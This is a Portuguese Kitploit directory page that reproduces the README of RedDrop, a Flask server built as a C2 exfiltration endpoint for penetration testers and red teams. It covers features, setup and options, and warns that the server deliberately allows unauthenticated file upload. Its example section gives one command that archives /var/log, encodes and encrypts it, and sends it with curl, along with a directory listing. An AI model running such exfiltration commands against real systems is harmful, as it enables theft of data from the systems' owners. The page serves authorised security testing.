Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RedDrop — Servidor web Python Flask para capturar, processar e registrar payloads codificados/criptografados e arquivos tar, projetado para testadores de penetração e equipes vermelhas como um endpoint de exfiltração C2. | Kitploit
Ferramentas/GitHubGitHub/cyberbutler/reddrop
Geração de PayloadsExfiltração de DadosSegurança WebComando e ControleRed Teaming
GitHubcyberbutler/reddrop

RedDrop

Servidor web Python Flask para capturar, processar e registrar payloads codificados/criptografados e arquivos tar, projetado para testadores de penetração e equipes vermelhas como um endpoint de exfiltração C2.

Ver Repositório
586há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Red Drop

RedDrop Exfil Server

Confira o post do blog da MaverisLabs aqui!

O RedDrop Exfil Server é um servidor web Python Flask para testadores de penetração, membros de equipes vermelhas e profissionais de segurança, que oferece:

  • Upload de Arquivos
  • Processamento Automático de Payloads
  • Extração Automática de Arquivos
  • Registro em JSON
  • Opções Configuráveis
  • Regras de Autorização

Este software destina-se a ser usado como um endpoint C2 rudimentar para capturar dados de requisições web em vários cenários. Alguns exemplos podem incluir:

  • Uma vulnerabilidade de injeção cega de comandos
  • Um ataque XSS onde um servidor de registro de requisições web rápido e dinâmico é necessário
  • Uma situação em que o acesso remoto ao shell foi obtido e um servidor de exfiltração baseado em web com registro detalhado é desejado

Demo

Demo

Este projeto ainda está em desenvolvimento e alguns recursos podem apresentar bugs. Se você encontrar problemas, por favor, abra uma Issue!

Uma nota sobre segurança

Este software não deve ser deixado geralmente acessível à Internet ampla. Ele é construído com o que alguns podem considerar uma vulnerabilidade de Upload Arbitrário de Arquivos intencionalmente, e aceitará e salvará arquivos no disco local sem autenticação. Deve-se tomar cuidado para garantir que o sistema para o qual este software é implantado esteja devidamente protegido. Algumas recomendações:

  • Utilize o recurso de Regras de Autorização do RedDrop para recusar requisições que não atendam aos seus critérios.
  • Coloque um Proxy Reverso para rotear e bloquear o tráfego para esta aplicação web
  • Coloque na lista de permissões o espaço IP do seu alvo
  • Não extraia automaticamente arquivos sem entender meu método de filtragem

Quick Start

Docker

root@kitploit:~
mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h

PipEnv

root@kitploit:~
pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h

Options

root@kitploit:~
python reddrop-server.py -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
                        0.0.0.0)
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
                        True)
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
  --encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
  -r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t acme.org (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options

Examples

Exfiltrando um arquivo Tar e a saída de comando de um sistema Linux

root@kitploit:~
tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"

example-screenshot.png

Todo

  • Maior documentação de técnicas usando este servidor web
  • Manipulação de upload de arquivos fragmentados e comandos de exemplo
  • Mais módulos de processamento
  • Expandir a funcionalidade de extração de arquivos
Baixar ferramenta